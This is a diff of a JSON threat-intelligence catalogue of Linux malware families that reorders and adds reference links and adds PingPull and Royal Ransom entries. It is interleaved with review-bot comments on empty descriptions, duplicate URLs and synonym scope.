+ "https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/"
],
"synonyms": [],
"type": []
@@ -5341,18 +5821,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.penquin_turla",
- "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
- "https://lab52.io/blog/looking-for-penquins-in-the-wild/",
"https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf",
- "https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf",
- "https://www.youtube.com/watch?v=JXsjRUxx47E",
- "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf",
+ "https://securelist.com/big-threats-using-code-similarity-part-1/97239/",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://twitter.com/juanandres_gs/status/944741575837528064",
+ "https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf",
+ "https://lab52.io/blog/looking-for-penquins-in-the-wild/",
"https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf",
"https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf",
- "https://twitter.com/juanandres_gs/status/944741575837528064"
+ "https://www.youtube.com/watch?v=JXsjRUxx47E",
+ "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf"
],
"synonyms": [],
"type": []
@@ -5365,17 +5845,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.perlbot",
- "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html",
- "https://twitter.com/Nocturnus/status/1308430959512092673",
- "https://jask.com/wp-content/uploads/2019/02/Shellbot-Campaign_v2.pdf",
- "https://brianstadnicki.github.io/posts/malware-gitlab-perlbot/",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://unit42.paloaltonetworks.com/los-zetas-from-eleethub-botnet/",
- "https://sysdig.com/blog/malware-analysis-shellbot-sysdig/",
"https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/",
"https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf",
+ "https://twitter.com/Nocturnus/status/1308430959512092673",
+ "https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html",
+ "https://therecord.media/agents-raid-home-of-kansas-man-seeking-info-on-botnet-that-infected-dod-network/",
"https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/",
- "https://therecord.media/agents-raid-home-of-kansas-man-seeking-info-on-botnet-that-infected-dod-network/"
+ "https://brianstadnicki.github.io/posts/malware-gitlab-perlbot/",
+ "https://unit42.paloaltonetworks.com/los-zetas-from-eleethub-botnet/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://sysdig.com/blog/malware-analysis-shellbot-sysdig/",
+ "https://jask.com/wp-content/uploads/2019/02/Shellbot-Campaign_v2.pdf",
+ "https://asec.ahnlab.com/en/49769/"
],
"synonyms": [
"DDoS Perl IrcBot",
@@ -5399,6 +5880,19 @@
"uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7",
"value": "Persirai"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.pingpull",
+ "https://unit42.paloaltonetworks.com/alloy-taurus/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "65a7944c-15d9-4ca5-8561-7c97b18684c8",
+ "value": "PingPull"
+ },
{
"description": "A botnet with P2P and centralized C&C capabilities.",
"meta": {
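Review bot: the new PingPull cluster ships with `"description": ""`, which renders as a blank entry in the galaxy and gives analysts nothing to match on; either populate it from the linked Unit42 Alloy Taurus write-up or the Malpedia page, or state in the commit why it is deliberately left empty. Also confirm the uuid `65a7944c-15d9-4ca5-8561-7c97b18684c8` is freshly generated and not reused from any other cluster in the galaxy.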
@@ -5417,13 +5911,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.plead",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
+ "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
+ "https://cyberandramen.net/2021/02/11/blacktech-updates-elf-plead-backdoor/",
"https://blogs.jpcert.or.jp/en/2020/11/elf-plead.html",
"https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
- "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
- "https://cyberandramen.net/2021/02/11/blacktech-updates-elf-plead-backdoor/",
- "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020"
+ "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf"
],
"synonyms": [],
"type": []
@@ -5464,13 +5959,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.prometei",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
+ "https://twitter.com/IntezerLabs/status/1338480158249013250",
+ "https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html",
+ "https://cujo.com/iot-malware-journals-prometei-linux/",
"https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
"https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities",
- "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
- "https://blog.talosintelligence.com/2020/07/prometei-botnet-and-its-quest-for-monero.html",
- "https://twitter.com/IntezerLabs/status/1338480158249013250",
- "https://cujo.com/iot-malware-journals-prometei-linux/"
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
],
"synonyms": [],
"type": []
@@ -5497,8 +5992,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.pupy",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf",
- "https://github.com/n1nj4sec/pupy"
+ "https://github.com/n1nj4sec/pupy",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf"
],
"synonyms": [],
"type": []
@@ -5511,18 +6006,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.qnapcrypt",
- "https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/",
"https://www.intezer.com/blog-seizing-15-active-ransomware-campaigns-targeting-linux-file-storage-servers/",
- "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt",
"https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
- "https://unit42.paloaltonetworks.com/ech0raix-ransomware-soho/",
- "https://www.ibm.com/downloads/cas/Z81AVOY7",
- "https://www.bleepingcomputer.com/news/security/qnap-warns-of-ech0raix-ransomware-attacks-roon-server-zero-day/",
- "https://documents.trendmicro.com/assets/pdf/wp-backing-your-backup-defending-nas-devices-against-evolving-threats.pdf",
- "https://www.qnap.com/en/security-advisory/QSA-20-02",
"https://www.anomali.com/blog/the-ech0raix-ransomware",
"https://blog.netlab.360.com/qnap-nas-users-make-sure-you-check-your-system/",
- "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought"
+ "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt",
+ "https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
+ "https://www.bleepingcomputer.com/news/security/qnap-warns-of-ech0raix-ransomware-attacks-roon-server-zero-day/",
+ "https://www.qnap.com/en/security-advisory/QSA-20-02",
+ "https://www.ibm.com/downloads/cas/Z81AVOY7",
+ "https://www.intezer.com/blog-russian-cybercrime-group-fullofdeep-behind-qnapcrypt-ransomware-campaigns/",
+ "https://documents.trendmicro.com/assets/pdf/wp-backing-your-backup-defending-nas-devices-against-evolving-threats.pdf",
+ "https://unit42.paloaltonetworks.com/ech0raix-ransomware-soho/"
],
"synonyms": [
"eCh0raix"
@@ -5537,12 +6032,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.qsnatch",
- "https://bin.re/blog/the-dga-of-qsnatch/",
- "https://documents.trendmicro.com/assets/pdf/wp-backing-your-backup-defending-nas-devices-against-evolving-threats.pdf",
"https://www.trendmicro.com/en_us/research/21/l/the-evolution-of-iot-linux-malware-based-on-mitre-att&ck-ttps.html",
- "https://www.ncsc.gov.uk/files/NCSC%20CISA%20Alert%20-QNAP%20NAS%20Devices.pdf",
"https://www.kyberturvallisuuskeskus.fi/en/news/qsnatch-malware-designed-qnap-nas-devices",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-209a"
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-209a",
+ "https://www.ncsc.gov.uk/files/NCSC%20CISA%20Alert%20-QNAP%20NAS%20Devices.pdf",
+ "https://bin.re/blog/the-dga-of-qsnatch/",
+ "https://documents.trendmicro.com/assets/pdf/wp-backing-your-backup-defending-nas-devices-against-evolving-threats.pdf"
],
"synonyms": [],
"type": []
@@ -5555,7 +6050,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.quietexit",
- "https://www.mandiant.com/resources/unc3524-eye-spy-email"
+ "https://www.mandiant.com/resources/unc3524-eye-spy-email",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023"
],
"synonyms": [],
"type": []
@@ -5582,6 +6078,7 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.ragnarlocker",
"https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/analysis-and-protections-for-ragnarlocker-ransomware.html",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
"https://twitter.com/malwrhunterteam/status/1475568201673105409"
],
"synonyms": [],
@@ -5609,23 +6106,24 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.ransomexx",
- "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
- "https://www.ctir.gov.br/arquivos/alertas/2020/alerta_2020_03_ataques_de_ransomware.pdf",
- "https://www.youtube.com/watch?v=qxPXxWMI2i4",
- "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
"https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://www.ic3.gov/Media/News/2021/211101.pdf",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
"https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/"
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.ctir.gov.br/arquivos/alertas/2020/alerta_2020_03_ataques_de_ransomware.pdf",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.ic3.gov/Media/News/2021/211101.pdf",
+ "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://gustavopalazolo.medium.com/ransomexx-an%C3%A1lise-do-ransomware-utilizado-no-ataque-ao-stj-918001ec8195",
+ "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
+ "https://www.youtube.com/watch?v=qxPXxWMI2i4",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf"
],
"synonyms": [
"Defray777"
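Review bot: the reordered RansomEXX refs still carry the same CrowdStrike post twice, once plain and once with `?utm_campaign=...&utm_content=sprout` tracking parameters, and the Group-IB report twice (the cisoclub.ru direct link and the web.archive.org copy); since this hunk already rewrites the whole list, strip the utm_ variant and keep the archive link only if the direct one is dead. The one genuine addition, the VMware post on ESXi-targeting ransomware, is buried in the reorder and would be far easier to review as a single `+` line.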
@@ -5640,6 +6138,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.rapper_bot",
+ "https://socradar.io/linux-malware-rapperbot-brute-forcing-ssh-servers/",
+ "https://www.fortinet.com/blog/threat-research/new-rapperbot-campaign-ddos-attacks",
"https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery"
],
"synonyms": [],
@@ -5705,8 +6205,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.red_alert",
+ "https://blog.cyble.com/2022/07/12/new-ransomware-groups-on-the-rise/",
"https://www.bleepingcomputer.com/news/security/new-redalert-ransomware-targets-windows-linux-vmware-esxi-servers/",
- "https://blog.cyble.com/2022/07/12/new-ransomware-groups-on-the-rise/"
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html"
],
"synonyms": [
"N13V"
@@ -5721,15 +6222,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.rekoobe",
- "https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-part-3-advanced-analysis/",
"https://vms.drweb.com/virus/?i=7754026&lng=en",
"https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/",
- "https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt",
- "https://twitter.com/billyleonard/status/1458531997576572929",
"https://www.sekoia.io/en/walking-on-apt31-infrastructure-footprints/",
+ "https://intezer.com/blog-linux-rekoobe-operating-with-new-undetected-malware-samples/",
"https://sansec.io/research/rekoobe-fishpig-magento",
+ "https://www.intezer.com/blog/malware-analysis/elf-malware-analysis-101-part-3-advanced-analysis/",
"https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/",
- "https://intezer.com/blog-linux-rekoobe-operating-with-new-undetected-malware-samples/"
+ "https://twitter.com/billyleonard/status/1458531997576572929",
+ "https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt"
],
"synonyms": [],
"type": []
@@ -5743,8 +6244,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.reptile",
"https://github.com/f0rb1dd3n/Reptile",
- "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf",
- "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf"
+ "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
+ "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf"
],
"synonyms": [],
"type": []
@@ -5757,57 +6258,58 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.revil",
- "https://github.com/f0wl/REconfig-linux",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
- "https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo",
- "https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment",
- "https://www.bbc.com/news/technology-59297187",
- "https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf",
- "https://twitter.com/VK_Intel/status/1409601311092490248",
"https://www.youtube.com/watch?v=mDUMpYAOMOo",
- "https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
- "https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil",
- "https://home.treasury.gov/news/press-releases/jy0471",
- "https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/",
- "https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf",
- "https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/",
- "https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021",
- "https://analyst1.com/file-assets/History-of-REvil.pdf",
+ "https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo",
"https://otx.alienvault.com/pulse/60da2c80aa5400db8f1561d5",
- "https://angle.ankura.com/post/102hcny/revix-linux-ransomware",
- "https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/",
- "https://threatpost.com/ransomware-revil-sites-disappears/167745/",
- "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/",
- "http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html",
- "https://ke-la.com/will-the-revils-story-finally-be-over/",
- "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa",
- "https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ",
- "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
- "https://twitter.com/VK_Intel/status/1409601311092490248?s=20",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil",
- "https://twitter.com/IntezerLabs/status/1452980772953071619",
- "https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released",
- "https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/",
- "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
- "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/",
- "https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya",
- "https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin",
- "https://malienist.medium.com/revix-linux-ransomware-d736956150d0",
- "https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version",
- "https://www.flashpoint-intel.com/blog/revil-disappears-again/",
"https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html",
- "https://www.youtube.com/watch?v=ptbNMlWxYnE",
- "https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf",
- "https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20",
+ "https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil",
+ "https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya",
+ "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
"https://www.darktrace.com/en/blog/staying-ahead-of-r-evils-ransomware-as-a-service-business-model/",
- "https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/"
+ "https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf",
+ "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
+ "https://malienist.medium.com/revix-linux-ransomware-d736956150d0",
+ "https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf",
+ "https://home.treasury.gov/news/press-releases/jy0471",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released",
+ "https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ",
+ "https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf",
+ "https://ke-la.com/will-the-revils-story-finally-be-over/",
+ "https://angle.ankura.com/post/102hcny/revix-linux-ransomware",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/",
+ "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
+ "https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version",
+ "https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20",
+ "https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend",
+ "https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/",
+ "https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/",
+ "https://analyst1.com/file-assets/History-of-REvil.pdf",
+ "https://www.flashpoint-intel.com/blog/revil-disappears-again/",
+ "https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021",
+ "https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/",
+ "https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin",
+ "https://threatpost.com/ransomware-revil-sites-disappears/167745/",
+ "https://www.bbc.com/news/technology-59297187",
+ "https://github.com/f0wl/REconfig-linux",
+ "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa",
+ "https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/",
+ "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
+ "http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html",
+ "https://twitter.com/IntezerLabs/status/1452980772953071619",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://www.youtube.com/watch?v=ptbNMlWxYnE",
+ "https://twitter.com/VK_Intel/status/1409601311092490248?s=20",
+ "https://twitter.com/VK_Intel/status/1409601311092490248",
+ "https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/",
+ "https://threatpost.com/linux-variant-ransomware-vmwares-nas/167511/",
+ "https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment"
],
"synonyms": [
"REvix"
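Review bot: two entries in the REvil refs are the same VK_Intel tweet, `.../status/1409601311092490248` with and without `?s=20`; drop the `?s=20` variant while the list is being rewritten. The only substantive change in this 50-line hunk is the added VMware blog on ESXi-targeting ransomware, which is a strong hint that the generator should emit refs in a stable order rather than reshuffling the list on every run.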
@@ -5862,9 +6364,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.rotajakiro",
+ "https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/",
"https://www.domaintools.com/resources/blog/domaintools-and-digital-archeology-a-look-at-rotajakiro",
- "https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/",
- "https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/"
+ "https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/"
],
"synonyms": [],
"type": []
@@ -5872,6 +6374,23 @@
"uuid": "66fb7b48-60f2-44fc-9cbe-f70e776d058b",
"value": "RotaJakiro"
},
+ {
+ "description": "According to Trendmicro, Royal ransomware was first observed in September 2022, and the threat actors behind it are believed to be seasoned cybercriminals who used to be part of Conti Team One.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.royal_ransom",
+ "https://unit42.paloaltonetworks.com/royal-ransomware/",
+ "https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html"
+ ],
+ "synonyms": [
+ "Royal",
+ "Royal_unix"
+ ],
+ "type": []
+ },
+ "uuid": "4e29dae1-5a8c-4b3c-81dc-dcc0fdd3c93a",
+ "value": "Royal Ransom (ELF)"
+ },
{
"description": "",
"meta": {
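Review bot: the synonyms list gives the bare alias `Royal` for this ELF-specific cluster; a single-word synonym that is also the family's common name will match any mention of Royal ransomware regardless of platform, so confirm that is intended or keep only the Linux-specific name (`Royal_unix`). The description's claims (first observed September 2022, operators formerly of Conti Team One) are attributed to Trend Micro and a Trend Micro ref is present, so the sourcing is consistent.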
@@ -5890,26 +6409,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori",
- "http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/",
- "http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori",
"https://unit42.paloaltonetworks.com/satori-mirai-botnet-variant-targeting-vantage-velocity-field-unit-rce-vulnerability/",
- "https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/",
+ "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/",
